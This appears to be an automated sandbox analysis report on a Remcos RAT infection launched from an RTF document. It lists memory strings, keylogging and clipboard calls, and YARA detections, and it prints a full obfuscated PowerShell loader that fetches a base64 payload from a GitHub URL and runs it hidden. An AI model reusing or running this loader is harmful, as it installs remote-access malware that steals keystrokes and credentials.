                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.380858282.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.380858282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.381268650.0000000000AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: RegAsm.exe, 0000000D.00000002.380797855.000000000037C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/iK
                    Source: RegAsm.exe, 0000000D.00000002.380858282.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: RegAsm.exe, 0000000D.00000002.380858282.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://www.msn.com/
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                    Source: RegAsm.exe, 0000000B.00000002.383461474.0000000000383000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: RegAsm.exe, 0000000D.00000002.380858282.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://contextual.media.net/
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                    Source: powershell.exe, 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                    Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: powershell.exe, 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                    Source: powershell.exe, 00000008.00000002.369656883.000000000264A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                    Source: powershell.exe, 00000008.00000002.369656883.000000000264A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.372607566.00000000050C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                    Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.380858282.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000009_2_0040A2F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_004168FC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_0040987A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004098E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_00406DFC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_00406E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004068B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_004072B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,9_2_0040A41B
                    Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.6b080d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.6b080d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.374107971.00000000066A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3696, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3816, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.6b080d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.6b080d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.873764967.000000000051C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.874039059.000000000231E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.873637791.00000000004E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.873637791.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.374107971.00000000066A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3696, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3816, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CA73 SystemParametersInfoW,9_2_0041CA73

                    System Summary

                    barindex
                    Source: DSpWOKW7zn.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                    Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.powershell.exe.6b080d8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.powershell.exe.6b080d8.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.powershell.exe.6b080d8.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.powershell.exe.6b080d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.powershell.exe.6b080d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000008.00000002.374107971.00000000066A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3580, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3696, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3696, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 3696, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: RegAsm.exe PID: 3816, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 